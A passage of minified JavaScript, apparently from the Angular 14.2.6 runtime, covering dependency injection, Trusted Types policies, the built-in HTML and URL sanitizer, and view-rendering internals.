if(1===n)t.push(i,t[0]),t[0]=e;else{for(n--,t.push(t[n-1],t[n]);n>a;)t[n]=t[n-2],n--;t[a]=e,t[a+1]=i}}(t,i,a,e)),i}function ch(t,a){const e=Cl(t,a);if(e>=0)return t[1|e]}function Cl(t,a){return function fd(t,a,e){let i=0,n=t.length>>e;for(;n!==i;){const r=i+(n-i>>1),c=t[r<<e];if(a===c)return r<<e;c>a?n=r:i=r+1}return~(n<<e)}(t,a,1)}const pi={},Hi="__NG_DI_FLAG__",_a="ngTempTokenPath",ca=/\n/gm,Dr="__source";let Ao;function sr(t){const a=Ao;return Ao=t,a}function Fc(t,a=Da.Default){if(void 0===Ao)throw new gi(-203,!1);return null===Ao?Jp(t,void 0,a):Ao.get(t,a&Da.Optional?null:void 0,a)}function At(t,a=Da.Default){return(function vf(){return Vm}()||Fc)(La(t),a)}function Po(t,a=Da.Default){return"number"!=typeof a&&(a=0|(a.optional&&8)|(a.host&&1)|(a.self&&2)|(a.skipSelf&&4)),At(t,a)}function Vf(t){const a=[];for(let e=0;e<t.length;e++){const i=La(t[e]);if(Array.isArray(i)){if(0===i.length)throw new gi(900,!1);let n,r=Da.Default;for(let c=0;c<i.length;c++){const d=i[c],T=dh(d);"number"==typeof T?-1===T?n=d.token:r|=T:n=d}a.push(At(n,r))}else a.push(At(i))}return a}function eu(t,a){return t[Hi]=a,t.prototype[Hi]=a,t}function dh(t){return t[Hi]}const Cc=eu(tm("Optional"),8),Vc=eu(tm("SkipSelf"),4);let H_,L0,z0;function Hf(t){var a;return(null===(a=function TC(){if(void 0===L0&&(L0=null,vo.trustedTypes))try{L0=vo.trustedTypes.createPolicy("angular",{createHTML:t=>t,createScript:t=>t,createScriptURL:t=>t})}catch(t){}return L0}())||void 0===a?void 0:a.createHTML(t))||t}function xC(){if(void 0===z0&&(z0=null,vo.trustedTypes))try{z0=vo.trustedTypes.createPolicy("angular#unsafe-bypass",{createHTML:t=>t,createScript:t=>t,createScriptURL:t=>t})}catch(t){}return z0}function wC(t){var a;return(null===(a=xC())||void 0===a?void 0:a.createHTML(t))||t}function XM(t){var a;return(null===(a=xC())||void 0===a?void 0:a.createScriptURL(t))||t}class ph{constructor(a){this.changingThisBreaksApplicationSecurity=a}toString(){return`SafeValue must use [property]=binding: ${this.changingThisBreaksApplicationSecurity} (see https://g.co/ng/security#xss)`}}class oE extends ph{getTypeName(){return"HTML"}}class rE extends ph{getTypeName(){return"Style"}}class IC extends ph{getTypeName(){return"Script"}}class sE extends ph{getTypeName(){return"URL"}}class RC extends ph{getTypeName(){return"ResourceURL"}}function Hc(t){return t instanceof ph?t.changingThisBreaksApplicationSecurity:t}function Fi(t,a){const e=function Uf(t){return t instanceof ph&&t.getTypeName()||null}(t);if(null!=e&&e!==a){if("ResourceURL"===e&&"URL"===a)return!0;throw new Error(`Required a safe ${a}, got a ${e} (see https://g.co/ng/security#xss)`)}return e===a}class lE{constructor(a){this.inertDocumentHelper=a}getInertBodyElement(a){a="<body><remove></remove>"+a;try{const e=(new window.DOMParser).parseFromString(Hf(a),"text/html").body;return null===e?this.inertDocumentHelper.getInertBodyElement(a):(e.removeChild(e.firstChild),e)}catch(e){return null}}}class F0{constructor(a){if(this.defaultDoc=a,this.inertDocument=this.defaultDoc.implementation.createHTMLDocument("sanitization-inert"),null==this.inertDocument.body){const e=this.inertDocument.createElement("html");this.inertDocument.appendChild(e);const i=this.inertDocument.createElement("body");e.appendChild(i)}}getInertBodyElement(a){const e=this.inertDocument.createElement("template");if("content"in e)return e.innerHTML=Hf(a),e;const i=this.inertDocument.createElement("body");return i.innerHTML=Hf(a),this.defaultDoc.documentMode&&this.stripCustomNsAttrs(i),i}stripCustomNsAttrs(a){const e=a.attributes;for(let n=e.length-1;0<n;n--){const c=e.item(n).name;("xmlns:ns1"===c||0===c.indexOf("ns1:"))&&a.removeAttribute(c)}let i=a.firstChild;for(;i;)i.nodeType===Node.ELEMENT_NODE&&this.stripCustomNsAttrs(i),i=i.nextSibling}}const V0=/^(?:(?:https?|mailto|data|ftp|tel|file|sms):|[^&:/?#]*(?:[/?#]|$))/gi;function B0(t){return(t=String(t)).match(V0)?t:"unsafe:"+t}function am(t){const a={};for(const e of t.split(","))a[e]=!0;return a}function qf(...t){const a={};for(const e of t)for(const i in e)e.hasOwnProperty(i)&&(a[i]=!0);return a}const YM=am("area,br,col,hr,img,wbr"),SC=am("colgroup,dd,dt,li,p,tbody,td,tfoot,th,thead,tr"),JM=am("rp,rt"),H0=qf(YM,qf(SC,am("address,article,aside,blockquote,caption,center,del,details,dialog,dir,div,dl,figure,figcaption,footer,h1,h2,h3,h4,h5,h6,header,hgroup,hr,ins,main,map,menu,nav,ol,pre,section,summary,table,ul")),qf(JM,am("a,abbr,acronym,audio,b,bdi,bdo,big,br,cite,code,del,dfn,em,font,i,img,ins,kbd,label,map,mark,picture,q,ruby,rp,rt,s,samp,small,source,span,strike,strong,sub,sup,time,track,tt,u,var,video")),qf(JM,SC)),kC=am("background,cite,href,itemtype,longdesc,poster,src,xlink:href"),ev=qf(kC,am("abbr,accesskey,align,alt,autoplay,axis,bgcolor,border,cellpadding,cellspacing,class,clear,color,cols,colspan,compact,controls,coords,datetime,default,dir,download,face,headers,height,hidden,hreflang,hspace,ismap,itemscope,itemprop,kind,label,lang,language,loop,media,muted,nohref,nowrap,open,preload,rel,rev,role,rows,rowspan,rules,scope,scrolling,shape,size,sizes,span,srclang,srcset,start,summary,tabindex,target,title,translate,type,usemap,valign,value,vspace,width"),am("aria-activedescendant,aria-atomic,aria-autocomplete,aria-busy,aria-checked,aria-colcount,aria-colindex,aria-colspan,aria-controls,aria-current,aria-describedby,aria-details,aria-disabled,aria-dropeffect,aria-errormessage,aria-expanded,aria-flowto,aria-grabbed,aria-haspopup,aria-hidden,aria-invalid,aria-keyshortcuts,aria-label,aria-labelledby,aria-level,aria-live,aria-modal,aria-multiline,aria-multiselectable,aria-orientation,aria-owns,aria-placeholder,aria-posinset,aria-pressed,aria-readonly,aria-relevant,aria-required,aria-roledescription,aria-rowcount,aria-rowindex,aria-rowspan,aria-selected,aria-setsize,aria-sort,aria-valuemax,aria-valuemin,aria-valuenow,aria-valuetext")),fE=am("script,style,template");class U0{constructor(){this.sanitizedSomething=!1,this.buf=[]}sanitizeChildren(a){let e=a.firstChild,i=!0;for(;e;)if(e.nodeType===Node.ELEMENT_NODE?i=this.startElement(e):e.nodeType===Node.TEXT_NODE?this.chars(e.nodeValue):this.sanitizedSomething=!0,i&&e.firstChild)e=e.firstChild;else for(;e;){e.nodeType===Node.ELEMENT_NODE&&this.endElement(e);let n=this.checkClobberedElement(e,e.nextSibling);if(n){e=n;break}e=this.checkClobberedElement(e,e.parentNode)}return this.buf.join("")}startElement(a){const e=a.nodeName.toLowerCase();if(!H0.hasOwnProperty(e))return this.sanitizedSomething=!0,!fE.hasOwnProperty(e);this.buf.push("<"),this.buf.push(e);const i=a.attributes;for(let n=0;n<i.length;n++){const r=i.item(n),c=r.name,d=c.toLowerCase();if(!ev.hasOwnProperty(d)){this.sanitizedSomething=!0;continue}let T=r.value;kC[d]&&(T=B0(T)),this.buf.push(" ",c,'="',q_(T),'"')}return this.buf.push(">"),!0}endElement(a){const e=a.nodeName.toLowerCase();H0.hasOwnProperty(e)&&!YM.hasOwnProperty(e)&&(this.buf.push("</"),this.buf.push(e),this.buf.push(">"))}chars(a){this.buf.push(q_(a))}checkClobberedElement(a,e){if(e&&(a.compareDocumentPosition(e)&Node.DOCUMENT_POSITION_CONTAINED_BY)===Node.DOCUMENT_POSITION_CONTAINED_BY)throw new Error(`Failed to sanitize html because the element is clobbered: ${a.outerHTML}`);return e}}const Ml=/[\uD800-\uDBFF][\uDC00-\uDFFF]/g,tv=/([^\#-~ |!])/g;function q_(t){return t.replace(/&/g,"&amp;").replace(Ml,function(a){return"&#"+(1024*(a.charCodeAt(0)-55296)+(a.charCodeAt(1)-56320)+65536)+";"}).replace(tv,function(a){return"&#"+a.charCodeAt(0)+";"}).replace(/</g,"&lt;").replace(/>/g,"&gt;")}let q0;function iv(t,a){let e=null;try{q0=q0||function U_(t){const a=new F0(t);return function dE(){try{return!!(new window.DOMParser).parseFromString(Hf(""),"text/html")}catch(t){return!1}}()?new lE(a):a}(t);let i=a?String(a):"";e=q0.getInertBodyElement(i);let n=5,r=i;do{if(0===n)throw new Error("Failed to sanitize html because the input is unstable");n--,i=r,r=e.innerHTML,e=q0.getInertBodyElement(i)}while(i!==r);return Hf((new U0).sanitizeChildren(G_(e)||e))}finally{if(e){const i=G_(e)||e;for(;i.firstChild;)i.removeChild(i.firstChild)}}}function G_(t){return"content"in t&&function Gf(t){return t.nodeType===Node.ELEMENT_NODE&&"TEMPLATE"===t.nodeName}(t)?t.content:null}var oo=(()=>((oo=oo||{})[oo.NONE=0]="NONE",oo[oo.HTML=1]="HTML",oo[oo.STYLE=2]="STYLE",oo[oo.SCRIPT=3]="SCRIPT",oo[oo.URL=4]="URL",oo[oo.RESOURCE_URL=5]="RESOURCE_URL",oo))();function Uc(t){const a=j_();return a?wC(a.sanitize(oo.HTML,t)||""):Fi(t,"HTML")?wC(Hc(t)):iv(function $M(){return void 0!==H_?H_:"undefined"!=typeof document?document:void 0}(),Qa(t))}function nm(t){const a=j_();return a?a.sanitize(oo.URL,t)||"":Fi(t,"URL")?Hc(t):B0(Qa(t))}function PC(t){const a=j_();if(a)return XM(a.sanitize(oo.RESOURCE_URL,t)||"");if(Fi(t,"ResourceURL"))return XM(Hc(t));throw new gi(904,!1)}function j_(){const t=bi();return t&&t[12]}const OC=new ni("ENVIRONMENT_INITIALIZER"),ov=new ni("INJECTOR",-1),rv=new ni("INJECTOR_DEF_TYPES");class sv{get(a,e=pi){if(e===pi){const i=new Error(`NullInjectorError: No provider for ${Wo(a)}!`);throw i.name="NullInjectorError",i}return e}}function CE(...t){return{\u0275providers:cv(0,t)}}function cv(t,...a){const e=[],i=new Set;let n;return Wc(a,r=>{const c=r;NC(c,e,[],i)&&(n||(n=[]),n.push(c))}),void 0!==n&&lv(n,e),e}function lv(t,a){for(let e=0;e<t.length;e++){const{providers:n}=t[e];Wc(n,r=>{a.push(r)})}}function NC(t,a,e,i){if(!(t=La(t)))return!1;let n=null,r=Xp(t);const c=!r&&Un(t);if(r||c){if(c&&!c.standalone)return!1;n=t}else{const T=t.ngModule;if(r=Xp(T),!r)return!1;n=T}const d=i.has(n);if(c){if(d)return!1;if(i.add(n),c.dependencies){const T="function"==typeof c.dependencies?c.dependencies():c.dependencies;for(const k of T)NC(k,a,e,i)}}else{if(!r)return!1;{if(null!=r.imports&&!d){let k;i.add(n);try{Wc(r.imports,q=>{NC(q,a,e,i)&&(k||(k=[]),k.push(q))})}finally{}void 0!==k&&lv(k,a)}if(!d){const k=Qd(n)||(()=>new n);a.push({provide:n,useFactory:k,deps:Xn},{provide:rv,useValue:n,multi:!0},{provide:OC,useValue:()=>At(n),multi:!0})}const T=r.providers;null==T||d||Wc(T,q=>{a.push(q)})}}return n!==t&&void 0!==t.providers}const fe=Bn({provide:String,useValue:Bn});function ce(t){return null!==t&&"object"==typeof t&&fe in t}function je(t){return"function"==typeof t}const dt=new ni("Set Injector scope."),_t={},gt={};let kt;function Lt(){return void 0===kt&&(kt=new sv),kt}class Ht{}class ui extends Ht{constructor(a,e,i,n){super(),this.parent=e,this.source=i,this.scopes=n,this.records=new Map,this._ngOnDestroyHooks=new Set,this._onDestroyHooks=[],this._destroyed=!1,Qi(a,c=>this.processProvider(c)),this.records.set(ov,ta(void 0,this)),n.has("environment")&&this.records.set(Ht,ta(void 0,this));const r=this.records.get(dt);null!=r&&"string"==typeof r.value&&this.scopes.add(r.value),this.injectorDefTypes=new Set(this.get(rv.multi,Xn,Da.Self))}get destroyed(){return this._destroyed}destroy(){this.assertNotDestroyed(),this._destroyed=!0;try{for(const a of this._ngOnDestroyHooks)a.ngOnDestroy();for(const a of this._onDestroyHooks)a()}finally{this.records.clear(),this._ngOnDestroyHooks.clear(),this.injectorDefTypes.clear(),this._onDestroyHooks.length=0}}onDestroy(a){this._onDestroyHooks.push(a)}runInContext(a){this.assertNotDestroyed();const e=sr(this),i=Bs(void 0);try{return a()}finally{sr(e),Bs(i)}}get(a,e=pi,i=Da.Default){this.assertNotDestroyed();const n=sr(this),r=Bs(void 0);try{if(!(i&Da.SkipSelf)){let d=this.records.get(a);if(void 0===d){const T=function Mn(t){return"function"==typeof t||"object"==typeof t&&t instanceof ni}(a)&&Hu(a);d=T&&this.injectableDefInScope(T)?ta(Ki(a),_t):null,this.records.set(a,d)}if(null!=d)return this.hydrate(a,d)}return(i&Da.Self?Lt():this.parent).get(a,e=i&Da.Optional&&e===pi?null:e)}catch(c){if("NullInjectorError"===c.name){if((c[_a]=c[_a]||[]).unshift(Wo(a)),n)throw c;return function mh(t,a,e,i){const n=t[_a];throw a[Dr]&&n.unshift(a[Dr]),t.message=function z_(t,a,e,i=null){t=t&&"\n"===t.charAt(0)&&"\u0275"==t.charAt(1)?t.slice(2):t;let n=Wo(a);if(Array.isArray(a))n=a.map(Wo).join(" -> ");else if("object"==typeof a){let r=[];for(let c in a)if(a.hasOwnProperty(c)){let d=a[c];r.push(c+":"+("string"==typeof d?JSON.stringify(d):Wo(d)))}n=`{${r.join(", ")}}`}return`${e}${i?"("+i+")":""}[${n}]: ${t.replace(ca,"\n  ")}`}("\n"+t.message,n,e,i),t.ngTokenPath=n,t[_a]=null,t}(c,a,"R3InjectorError",this.source)}throw c}finally{Bs(r),sr(n)}}resolveInjectorInitializers(){const a=sr(this),e=Bs(void 0);try{const i=this.get(OC.multi,Xn,Da.Self);for(const n of i)n()}finally{sr(a),Bs(e)}}toString(){const a=[],e=this.records;for(const i of e.keys())a.push(Wo(i));return`R3Injector[${a.join(", ")}]`}assertNotDestroyed(){if(this._destroyed)throw new gi(205,!1)}processProvider(a){let e=je(a=La(a))?a:La(a&&a.provide);const i=function Ui(t){return ce(t)?ta(void 0,t.useValue):ta(dn(t),_t)}(a);if(je(a)||!0!==a.multi)this.records.get(e);else{let n=this.records.get(e);n||(n=ta(void 0,_t,!0),n.factory=()=>Vf(n.multi),this.records.set(e,n)),e=a,n.multi.push(a)}this.records.set(e,i)}hydrate(a,e){return e.value===_t&&(e.value=gt,e.value=e.factory()),"object"==typeof e.value&&e.value&&function To(t){return null!==t&&"object"==typeof t&&"function"==typeof t.ngOnDestroy}(e.value)&&this._ngOnDestroyHooks.add(e.value),e.value}injectableDefInScope(a){if(!a.providedIn)return!1;const e=La(a.providedIn);return"string"==typeof e?"any"===e||this.scopes.has(e):this.injectorDefTypes.has(e)}}function Ki(t){const a=Hu(t),e=null!==a?a.factory:Qd(t);if(null!==e)return e;if(t instanceof ni)throw new gi(204,!1);if(t instanceof Function)return function Ni(t){const a=t.length;if(a>0)throw hd(a,"?"),new gi(204,!1);const e=function W2(t){const a=t&&(t[Ll]||t[Mf]);if(a){const e=function ls(t){if(t.hasOwnProperty("name"))return t.name;const a=(""+t).match(/^function\s*([^\s(]+)/);return null===a?"":a[1]}(t);return console.warn(`DEPRECATED: DI is instantiating a token "${e}" that inherits its @Injectable decorator but does not provide one itself.\nThis will become an error in a future version of Angular. Please add @Injectable() to the "${e}" class.`),a}return null}(t);return null!==e?()=>e.factory(t):()=>new t}(t);throw new gi(204,!1)}function dn(t,a,e){let i;if(je(t)){const n=La(t);return Qd(n)||Ki(n)}if(ce(t))i=()=>La(t.useValue);else if(function _e(t){return!(!t||!t.useFactory)}(t))i=()=>t.useFactory(...Vf(t.deps||[]));else if(function ge(t){return!(!t||!t.useExisting)}(t))i=()=>At(La(t.useExisting));else{const n=La(t&&(t.useClass||t.provide));if(!function na(t){return!!t.deps}(t))return Qd(n)||Ki(n);i=()=>new n(...Vf(t.deps))}return i}function ta(t,a,e=!1){return{factory:t,value:a,multi:e?[]:void 0}}function qa(t){return!!t.\u0275providers}function Qi(t,a){for(const e of t)Array.isArray(e)?Qi(e,a):qa(e)?Qi(e.\u0275providers,a):a(e)}class Yn{}class Gc{resolveComponentFactory(a){throw function Ka(t){const a=Error(`No component factory found for ${Wo(t)}. Did you add it to @NgModule.entryComponents?`);return a.ngComponent=t,a}(a)}}let On=(()=>{class t{}return t.NULL=new Gc,t})();function Ps(){return jc(or(),bi())}function jc(t,a){return new mi(pc(t,a))}let mi=(()=>{class t{constructor(e){this.nativeElement=e}}return t.__NG_ELEMENT_ID__=Ps,t})();function yc(t){return t instanceof mi?t.nativeElement:t}class qs{}let wr=(()=>{class t{}return t.__NG_ELEMENT_ID__=()=>function _h(){const t=bi(),e=hs(or().index,t);return(us(e)?e:t)[11]}(),t})(),gh=(()=>{class t{}return t.\u0275prov=hi({token:t,providedIn:"root",factory:()=>null}),t})();class nc{constructor(a){this.full=a,this.major=a.split(".")[0],this.minor=a.split(".")[1],this.patch=a.split(".").slice(2).join(".")}}const Ch=new nc("14.2.6"),Ul={};function AE(t){return t.ngOriginalError}class yh{constructor(){this._console=console}handleError(a){const e=this._findOriginalError(a);this._console.error("ERROR",a),e&&this._console.error("ORIGINAL ERROR",e)}_findOriginalError(a){let e=a&&AE(a);for(;e&&AE(e);)e=AE(e);return e||null}}const TE=new Map;let cee=0;const DE="__ngContext__";function bc(t,a){us(a)?(t[DE]=a[20],function dee(t){TE.set(t[20],t)}(a)):t[DE]=a}function zC(t){return t.ownerDocument.defaultView}function $c(t){return t.ownerDocument}function bh(t){return t instanceof Function?t():t}var vl=(()=>((vl=vl||{})[vl.Important=1]="Important",vl[vl.DashCase=2]="DashCase",vl))();function wE(t,a){return undefined(t,a)}function WC(t){const a=t[3];return Is(a)?a[3]:a}function IE(t){return iR(t[13])}function RE(t){return iR(t[4])}function iR(t){for(;null!==t&&!Is(t);)t=t[4];return t}function j0(t,a,e,i,n){if(null!=i){let r,c=!1;Is(i)?r=i:us(i)&&(c=!0,i=i[0]);const d=Ar(i);0===t&&null!==e?null==n?cR(a,e,d):$_(a,e,d,n||null,!0):1===t&&null!==e?$_(a,e,d,n||null,!0):2===t?function pR(t,a,e){const i=dv(t,a);i&&function Nee(t,a,e,i){t.removeChild(a,e,i)}(t,i,a,e)}(a,d,c):3===t&&a.destroyNode(d),null!=r&&function Wee(t,a,e,i,n){const r=e[7];r!==Ar(e)&&j0(a,t,i,r,n);for(let d=10;d<e.length;d++){const T=e[d];FC(T[1],T,t,a,i,r)}}(a,t,r,e,n)}}function kE(t,a,e){return t.createElement(a,e)}function nR(t,a){const e=t[9],i=e.indexOf(a),n=a[3];512&a[2]&&(a[2]&=-513,sd(n,-1)),e.splice(i,1)}function PE(t,a){if(t.length<=10)return;const e=10+a,i=t[e];if(i){const n=i[17];null!==n&&n!==t&&nR(n,i),a>0&&(t[e-1][4]=i[4]);const r=rh(t,10+a);!function xee(t,a){FC(t,a,a[11],2,null,null),a[0]=null,a[6]=null}(i[1],i);const c=r[19];null!==c&&c.detachView(r[1]),i[3]=null,i[4]=null,i[2]&=-65}return i}function oR(t,a){if(!(128&a[2])){const e=a[11];e.destroyNode&&FC(t,a,e,3,null,null),function Ree(t){let a=t[13];if(!a)return OE(t[1],t);for(;a;){let e=null;if(us(a))e=a[13];else{const i=a[10];i&&(e=i)}if(!e){for(;a&&!a[4]&&a!==t;)us(a)&&OE(a[1],a),a=a[3];null===a&&(a=t),us(a)&&OE(a[1],a),e=a&&a[4]}a=e}}(a)}}function OE(t,a){if(!(128&a[2])){a[2]&=-65,a[2]|=128,function Oee(t,a){let e;if(null!=t&&null!=(e=t.destroyHooks))for(let i=0;i<e.length;i+=2){const n=a[e[i]];if(!(n instanceof dd)){const r=e[i+1];if(Array.isArray(r))for(let c=0;c<r.length;c+=2){const d=n[r[c]],T=r[c+1];try{T.call(d)}finally{}}else try{r.call(n)}finally{}}}}(t,a),function Pee(t,a){const e=t.cleanup,i=a[7];let n=-1;if(null!==e)for(let r=0;r<e.length-1;r+=2)if("string"==typeof e[r]){const c=e[r+1],d="function"==typeof c?c(a):Ar(a[c]),T=i[n=e[r+2]],k=e[r+3];"boolean"==typeof k?d.removeEventListener(e[r],T,k):k>=0?i[n=k]():i[n=-k].unsubscribe(),r+=2}else{const c=i[n=e[r+1]];e[r].call(c)}if(null!==i){for(let r=n+1;r<i.length;r++)(0,i[r])();a[7]=null}}(t,a),1===a[1].type&&a[11].destroy();const e=a[17];if(null!==e&&Is(a[3])){e!==a[3]&&nR(e,a);const i=a[19];null!==i&&i.detachView(t)}!function mee(t){TE.delete(t[20])}(a)}}function rR(t,a,e){return function sR(t,a,e){let i=a;for(;null!==i&&40&i.type;)i=(a=i).parent;if(null===i)return e[0];if(2&i.flags){const n=t.data[i.directiveStart].encapsulation;if(n===dc.None||n===dc.Emulated)return null}return pc(i,e)}(t,a.parent,e)}function $_(t,a,e,i,n){t.insertBefore(a,e,i,n)}function cR(t,a,e){t.appendChild(a,e)}function lR(t,a,e,i,n){null!==i?$_(t,a,e,i,n):cR(t,a,e)}function dv(t,a){return t.parentNode(a)}function dR(t,a,e){return uR(t,a,e)}let uR=function mR(t,a,e){return 40&t.type?pc(t,e):null};function mv(t,a,e,i){const n=rR(t,i,a),r=a[11],d=dR(i.parent||a[6],i,a);if(null!=n)if(Array.isArray(e))for(let T=0;T<e.length;T++)lR(r,n,e[T],d,!1);else lR(r,n,e,d,!1)}function uv(t,a){if(null!==a){const e=a.type;if(3&e)return pc(a,t);if(4&e)return LE(-1,t[a.index]);if(8&e){const i=a.child;if(null!==i)return uv(t,i);{const n=t[a.index];return Is(n)?LE(-1,n):Ar(n)}}if(32&e)return wE(a,t)()||Ar(t[a.index]);{const i=fR(t,a);return null!==i?Array.isArray(i)?i[0]:uv(WC(t[16]),i):uv(t,a.next)}}return null}function fR(t,a){return null!==a?t[16][6].projection[a.projection]:null}function LE(t,a){const e=10+t+1;if(e<a.length){const i=a[e],n=i[1].firstChild;if(null!==n)return uv(i,n)}return a[7]}function zE(t,a,e,i,n,r,c){for(;null!=e;){const d=i[e.index],T=e.type;if(c&&0===a&&(d&&bc(Ar(d),i),e.flags|=4),64!=(64&e.flags))if(8&T)zE(t,a,e.child,i,n,r,!1),j0(a,t,n,d,r);else if(32&T){const k=wE(e,i);let q;for(;q=k();)j0(a,t,n,q,r);j0(a,t,n,d,r)}else 16&T?_R(t,a,i,e,n,r):j0(a,t,n,d,r);e=c?e.projectionNext:e.next}}function FC(t,a,e,i,n,r){zE(e,i,t.firstChild,a,n,r,!1)}function _R(t,a,e,i,n,r){const c=e[16],T=c[6].projection[i.projection];if(Array.isArray(T))for(let k=0;k<T.length;k++)j0(a,t,n,T[k],r);else zE(t,a,T,c[3],n,r,!0)}function gR(t,a,e){t.setAttribute(a,"style",e)}function WE(t,a,e){""===e?t.removeAttribute(a,"class"):t.setAttribute(a,"class",e)}function CR(t,a,e){let i=t.length;for(;;){const n=t.indexOf(a,e);if(-1===n)return n;if(0===n||t.charCodeAt(n-1)<=32){const r=a.length;if(n+r===i||t.charCodeAt(n+r)<=32)return n}e=n+1}}const yR="ng-template";function Vee(t,a,e){let i=0;for(;i<t.length;){let n=t[i++];if(e&&"class"===n){if(n=t[i],-1!==CR(n.toLowerCase(),a,0))return!0}else if(1===n){for(;i<t.length&&"string"==typeof(n=t[i++]);)if(n.toLowerCase()===a)return!0;return!1}}return!1}function bR(t){return 4===t.type&&t.value!==yR}function Bee(t,a,e){return a===(4!==t.type||e?t.value:yR)}function Hee(t,a,e){let i=4;const n=t.attrs||[],r=function Gee(t){for(let a=0;a<t.length;a++)if(th(t[a]))return a;return t.length}(n);let c=!1;for(let d=0;d<a.length;d++){const T=a[d];if("number"!=typeof T){if(!c)if(4&i){if(i=2|1&i,""!==T&&!Bee(t,T,e)||""===T&&1===a.length){if(om(i))return!1;c=!0}}else{const k=8&i?T:a[++d];if(8&i&&null!==t.attrs){if(!Vee(t.attrs,k,e)){if(om(i))return!1;c=!0}continue}const Y=Uee(8&i?"class":T,n,bR(t),e);if(-1===Y){if(om(i))return!1;c=!0;continue}if(""!==k){let te;te=Y>r?"":n[Y+1].toLowerCase();const pe=8&i?te:null;if(pe&&-1!==CR(pe,k,0)||2&i&&k!==te){if(om(i))return!1;c=!0}}}}else{if(!c&&!om(i)&&!om(T))return!1;if(c&&om(T))continue;c=!1,i=T|1&i}}return om(i)||c}function om(t){return 0==(1&t)}function Uee(t,a,e,i){if(null===a)return-1;let n=0;if(i||!e){let r=!1;for(;n<a.length;){const c=a[n];if(c===t)return n;if(3===c||6===c)r=!0;else{if(1===c||2===c){let d=a[++n];for(;"string"==typeof d;)d=a[++n];continue}if(4===c)break;if(0===c){n+=4;continue}}n+=r?1:2}return-1}return function jee(t,a){let e=t.indexOf(4);if(e>-1)for(e++;e<t.length;){const i=t[e];if("number"==typeof i)return-1;if(i===a)return e;e++}return-1}(a,t)}function MR(t,a,e=!1){for(let i=0;i<a.length;i++)if(Hee(t,a[i],e))return!0;return!1}function Qee(t,a){e:for(let e=0;e<a.length;e++){const i=a[e];if(t.length===i.length){for(let n=0;n<t.length;n++)if(t[n]!==i[n])continue e;return!0}}return!1}function vR(t,a){return t?":not("+a.trim()+")":a}function $ee(t){let a=t[0],e=1,i=2,n="",r=!1;for(;e<t.length;){let c=t[e];if("string"==typeof c)if(2&i){const d=t[++e];n+="["+c+(d.length>0?'="'+d+'"':"")+"]"}else 8&i?n+="."+c:4&i&&(n+=" "+c);else""!==n&&!om(c)&&(a+=vR(r,n),n=""),i=c,r=r||!om(i);e++}return""!==n&&(a+=vR(r,n)),a}const mn={};function C(t){AR(Rn(),bi(),Ss()+t,!1)}function AR(t,a,e,i){if(!i)if(3==(3&a[2])){const r=t.preOrderCheckHooks;null!==r&&ji(a,r,e)}else{const r=t.preOrderHooks;null!==r&&Zu(a,r,0,e)}hl(e)}function xR(t,a=null,e=null,i){const n=wR(t,a,e,i);return n.resolveInjectorInitializers(),n}function wR(t,a=null,e=null,i,n=new Set){const r=[e||Xn,CE(t)];return i=i||("object"==typeof t?void 0:Wo(t)),new ui(r,a||Lt(),i||null,n)}let Ko=(()=>{class t{static create(e,i){var n;if(Array.isArray(e))return xR({name:""},i,e,"");{const r=null!==(n=e.name)&&void 0!==n?n:"";return xR({name:r},e.parent,e.providers,r)}}}return t.THROW_IF_NOT_FOUND=pi,t.NULL=new sv,t.\u0275prov=hi({token:t,providedIn:"any",factory:()=>At(ov)}),t.__NG_ELEMENT_ID__=-1,t})();function Ee(t,a=Da.Default){const e=bi();return null===e?At(t,a):Zd(or(),e,La(t),a)}function _d(){throw new Error("invalid")}function fv(t,a){return t<<17|a<<2}function rm(t){return t>>17&32767}function UE(t){return 2|t}function Mh(t){return(131068&t)>>2}function qE(t,a){return-131069&t|a<<2}function GE(t){return 1|t}function GR(t,a){const e=t.contentQueries;if(null!==e)for(let i=0;i<e.length;i+=2){const n=e[i],r=e[i+1];if(-1!==r){const c=t.data[r];g_(n),c.contentQueries(2,a[r],r)}}}function gv(t,a,e,i,n,r,c,d,T,k,q){const Y=a.blueprint.slice();return Y[0]=n,Y[2]=76|i,(null!==q||t&&1024&t[2])&&(Y[2]|=1024),m_(Y),Y[3]=Y[15]=t,Y[8]=e,Y[10]=c||t&&t[10],Y[11]=d||t&&t[11],Y[12]=T||t&&t[12]||null,Y[9]=k||t&&t[9]||null,Y[6]=r,Y[20]=function lee(){return cee++}(),Y[21]=q,Y[16]=2==a.type?t[16]:Y,Y}function $0(t,a,e,i,n){let r=t.data[a];if(null===r)r=function ZE(t,a,e,i,n){const r=kf(),c=Xu(),T=t.data[a]=function Rte(t,a,e,i,n,r){return{type:e,index:i,insertBeforeIndex:null,injectorIndex:a?a.injectorIndex:-1,directiveStart:-1,directiveEnd:-1,directiveStylingLast:-1,propertyBindings:null,flags:0,providerIndexes:0,value:n,attrs:r,mergedAttrs:null,localNames:null,initialInputs:void 0,inputs:null,outputs:null,tViews:null,next:null,projectionNext:null,child:null,parent:a,projection:null,styles:null,stylesWithoutHost:null,residualStyles:void 0,classes:null,classesWithoutHost:null,residualClasses:void 0,classBindings:0,styleBindings:0}}(0,c?r:r&&r.parent,e,a,i,n);return null===t.firstChild&&(t.firstChild=T),null!==r&&(c?null==r.child&&null!==T.parent&&(r.child=T):null===r.next&&(r.next=T)),T}(t,a,e,i,n),function y0(){return Ua.lFrame.inI18n}()&&(r.flags|=64);else if(64&r.type){r.type=e,r.value=i,r.attrs=n;const c=function Kd(){const t=Ua.lFrame,a=t.currentTNode;return t.isParent?a:a.parent}();r.injectorIndex=null===c?-1:c.injectorIndex}return _c(r,!0),r}function K0(t,a,e,i){if(0===e)return-1;const n=a.length;for(let r=0;r<e;r++)a.push(i),t.blueprint.push(i),t.data.push(null);return n}function eD(t,a,e){C_(a);try{const i=t.viewQuery;null!==i&&cD(1,i,e);const n=t.template;null!==n&&jR(t,a,n,1,e),t.firstCreatePass&&(t.firstCreatePass=!1),t.staticContentQueries&&GR(t,a),t.staticViewQueries&&cD(2,t.viewQuery,e);const r=t.components;null!==r&&function xte(t,a){for(let e=0;e<a.length;e++)jte(t,a[e])}(a,r)}catch(i){throw t.firstCreatePass&&(t.incompleteFirstPass=!0,t.firstCreatePass=!1),i}finally{a[2]&=-5,b_()}}function Cv(t,a,e,i){const n=a[2];if(128!=(128&n)){C_(a);try{m_(a),function C0(t){return Ua.lFrame.bindingIndex=t}(t.bindingStartIndex),null!==e&&jR(t,a,e,2,i);const c=3==(3&n);if(c){const k=t.preOrderCheckHooks;null!==k&&ji(a,k,null)}else{const k=t.preOrderHooks;null!==k&&Zu(a,k,0,null),M_(a,0)}if(function qte(t){for(let a=IE(t);null!==a;a=RE(a)){if(!a[2])continue;const e=a[9];for(let 